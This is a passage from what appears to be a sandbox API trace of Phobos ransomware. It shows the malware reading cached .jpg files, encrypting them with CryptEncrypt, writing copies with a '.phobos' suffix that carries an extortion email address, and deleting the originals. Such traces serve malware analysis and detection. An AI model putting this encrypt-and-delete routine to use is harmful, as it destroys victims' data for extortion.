(in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9406) returned 1 [0174.780] CloseHandle (hObject=0x190) returned 1 [0174.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg")) returned 0x2020 [0174.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.780] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.780] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0174.780] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.780] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x24be, lpOverlapped=0x0) returned 1 [0174.881] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x24c0, dwBufLen=0x24c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x24c0) returned 1 [0174.881] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x24c0, lpOverlapped=0x0) returned 1 [0174.882] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0174.882] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.882] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.882] CryptDestroyKey (hKey=0xa32968) returned 1 [0174.882] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.896] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.896] CloseHandle (hObject=0x190) returned 1 [0174.896] CloseHandle (hObject=0x194) returned 1 [0174.920] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg")) returned 1 [0174.921] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.034] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10016) returned 1 [0175.034] CloseHandle (hObject=0x158) returned 1 [0175.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg")) returned 0x2020 [0175.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.035] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.035] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.035] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2720, lpOverlapped=0x0) returned 1 [0175.122] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2730, dwBufLen=0x2730 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2730) returned 1 [0175.122] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2730, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2730, lpOverlapped=0x0) returned 1 [0175.123] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.123] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.123] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.123] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.124] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.124] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.124] CloseHandle (hObject=0x158) returned 1 [0175.124] CloseHandle (hObject=0x190) returned 1 [0175.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0lyn[1].jpg")) returned 1 [0175.125] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.125] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2046) returned 1 [0175.125] CloseHandle (hObject=0x190) returned 1 [0175.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg")) returned 0x2020 [0175.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.126] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.126] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.127] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.127] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7fe, lpOverlapped=0x0) returned 1 [0175.150] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x800, dwBufLen=0x800 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x800) returned 1 [0175.150] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x800, lpOverlapped=0x0) returned 1 [0175.151] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.151] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.151] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.151] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.151] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.151] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.151] CloseHandle (hObject=0x190) returned 1 [0175.151] CloseHandle (hObject=0x158) returned 1 [0175.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbc0rda[2].jpg")) returned 1 [0175.152] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.154] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10482) returned 1 [0175.154] CloseHandle (hObject=0x158) returned 1 [0175.156] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg")) returned 0x2020 [0175.156] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.157] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.157] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x28f2, lpOverlapped=0x0) returned 1 [0175.166] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2900, dwBufLen=0x2900 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2900) returned 1 [0175.166] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2900, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2900, lpOverlapped=0x0) returned 1 [0175.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0175.167] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.167] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0175.168] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.168] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0175.168] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.168] CloseHandle (hObject=0x158) returned 1 [0175.168] CloseHandle (hObject=0x190) returned 1 [0175.168] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdk7yy[1].jpg")) returned 1 [0175.169] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0175.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.170] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2108) returned 1 [0175.170] CloseHandle (hObject=0x190) returned 1 [0175.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg")) returned 0x2020 [0175.170] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0175.170] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.170] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0175.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdrbsh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0175.171] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0175.171] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0175.171] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x83c, lpOverlapped=0x0) returned 1 [0175.221] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, 